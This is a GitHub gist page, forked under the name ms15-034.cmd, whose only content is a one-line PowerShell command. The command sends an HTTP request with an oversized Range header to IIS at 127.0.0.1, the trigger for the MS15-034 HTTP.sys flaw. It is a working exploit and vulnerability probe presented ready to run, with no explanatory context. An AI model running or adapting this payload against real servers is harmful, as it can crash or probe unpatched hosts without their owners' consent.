Skip to content

Instantly share code, notes, and snippets.

@hybriz
Forked from obscuresec/ms15-034.cmd
Created November 3, 2017 12:47
Show Gist options
  • Save hybriz/87a3e7cbbf7fae928032189a8d265816 to your computer and use it in GitHub Desktop.
Save hybriz/87a3e7cbbf7fae928032189a8d265816 to your computer and use it in GitHub Desktop.
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment